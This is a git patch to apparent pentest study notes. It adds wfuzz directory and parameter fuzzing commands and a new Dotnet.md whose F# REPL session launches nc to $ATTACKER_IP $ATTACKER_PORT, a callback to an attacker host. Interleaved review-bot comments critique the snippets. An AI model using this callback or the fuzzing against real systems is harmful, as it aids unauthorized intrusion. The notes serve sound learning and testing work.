From 9cd859fa25ab0e7649c45ccdf649e4d21e2d7ea7 Mon Sep 17 00:00:00 2001
From: whx
Date: Sun, 5 Mar 2023 17:16:35 +0100
Subject: [PATCH] bump
---
 Enumeration/Websites.md | 16 ++++++++++++-
 Exploits/IoT/Messaging_Protocols.md | 4 ++++
 Miscellaneous/Dotnet.md | 23 +++++++++++++++++++
 .../{ => Threat Intelligence}/ClamAV.md | 0
 .../{ => Threat Intelligence}/Snort.md | 0
 5 files changed, 42 insertions(+), 1 deletion(-)
 create mode 100644 Miscellaneous/Dotnet.md
 rename Miscellaneous/{ => Threat Intelligence}/ClamAV.md (100%)
 rename Miscellaneous/{ => Threat Intelligence}/Snort.md (100%)
diff --git a/Enumeration/Websites.md b/Enumeration/Websites.md
index 0d175ef..82c74ad 100644
--- a/Enumeration/Websites.md
+++ b/Enumeration/Websites.md
@@ -127,6 +127,20 @@ gobuster help dir
 ### Wfuzz
+#### URLs with Wfuzz
+
+* GET requests fuzzing with wfuzz
+```sh
+wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u $ATTACKER_IP/FUZZ -t 100 --hh 0
+```
+
+* POST requests fuzzing with wfuzz
+```sh
+wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u $ATTACKER_IP/FUZZ -t 100 --hh 0 -X POST
+```
+
+#### Parameters with Wfuzz
+
 * Fuzz parameters
 ```sh
 wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/common.txt -X POST --hh 45 -u http:///api/items\?FUZZ\=test
@@ -135,5 +149,5 @@ wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/common.txt -X POST --
 #### DNS with Wfuzz
 ```sh
- wfuzz -H "Host: FUZZ.example.com" --hc 302,400 -t 50 -H "User-Agent: DEDSEC" -c -z file,"/usr/share/seclists/Discovery/Web-Content/namelist.txt" http://example.com
+ wfuzz -H "Host: FUZZ.example.com" --hc 302,400 -t 50 -c -z file,"/usr/share/seclists/Discovery/Web-Content/namelist.txt" http://example.com
 ```
diff --git a/Exploits/IoT/Messaging_Protocols.md b/Exploits/IoT/Messaging_Protocols.md
index 3050fcc..e8ca1b8 100644
--- a/Exploits/IoT/Messaging_Protocols.md
+++ b/Exploits/IoT/Messaging_Protocols.md
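Review bot: Both commands added under "URLs with Wfuzz" pass `-u $ATTACKER_IP/FUZZ`, but the host being enumerated is the target, not the tester's own machine, and the URL carries no scheme; something like `-u http://$TARGET_IP/FUZZ` would match the `http://` form used by the parameter example right below. The "POST requests" command reuses the directory wordlist and sends no body (`-d`), so a short sentence saying it only switches the method for path discovery would keep it from being confused with parameter fuzzing. `-t 100` is ten times wfuzz's default of 10 concurrent connections, and `--hh 0` only hides empty responses; a one-line caveat that this concurrency can overload or trip rate limiting on an in-scope host, and that the hide filter usually needs tuning per target, would help readers.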
@@ -24,3 +24,7 @@ mosquitto_sub -h -t '#'
 ```
 * `mosquitto_pub -h ` to publish to topics through mentioning the device ID. Can be send as raw, xml or json. `-f` for file sending
 * Base64 encoding
+
+## References
+
+* [Mosquitto usage](https://cedalo.com/blog/mqtt-subscribe-publish-mosquitto-pub-sub-example/)
diff --git a/Miscellaneous/Dotnet.md b/Miscellaneous/Dotnet.md
new file mode 100644
index 0000000..4d421da
--- /dev/null
+++ b/Miscellaneous/Dotnet.md
@@ -0,0 +1,23 @@
+# Dotnet
+
+## Run Dotnet on Linux
+
+### Dotnet REPL
+
+* Dotnet can be executed just in time via dotnet commandline tool. An example on how to use this follows
+```sh
+dotnet fsi
+
+Microsoft (R) F# Interactive version 12.0.0.0 for F# 6.0
+Copyright (c) Microsoft Corporation. All Rights Reserved.
+
+For help type #help;;
+
+> open System.Diagnostics
+- let psi = new ProcessStartInfo("nc", "$ATTACKER_IP $ATTACKER_PORT")
+- psi.UseShellExecute <- false
+- let _proc = Process.Start(psi)
+- _proc.WaitForExit() |> ignore
+- #quit;;
+```
+
diff --git a/Miscellaneous/ClamAV.md b/Miscellaneous/Threat Intelligence/ClamAV.md
similarity index 100%
rename from Miscellaneous/ClamAV.md
rename to Miscellaneous/Threat Intelligence/ClamAV.md
diff --git a/Miscellaneous/Snort.md b/Miscellaneous/Threat Intelligence/Snort.md
similarity index 100%
rename from Miscellaneous/Snort.md
rename to Miscellaneous/Threat Intelligence/Snort.md
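Review bot: The fence in the new Dotnet.md is tagged `sh`, but only its first line (`dotnet fsi`) is a shell command; everything from the version banner to `#quit;;` is an F# Interactive transcript, so one `sh` fence for the command and a separate `fsharp` fence for the session would render and copy correctly. The bullet "Dotnet can be executed just in time" does not say what the example does; a sentence such as `The session below starts an external program (nc) as a child process through System.Diagnostics.Process.` would make that explicit. A note for defensive readers would also fit here: process-creation telemetry should show that child with `dotnet` as its parent, which is where this use of the REPL becomes visible.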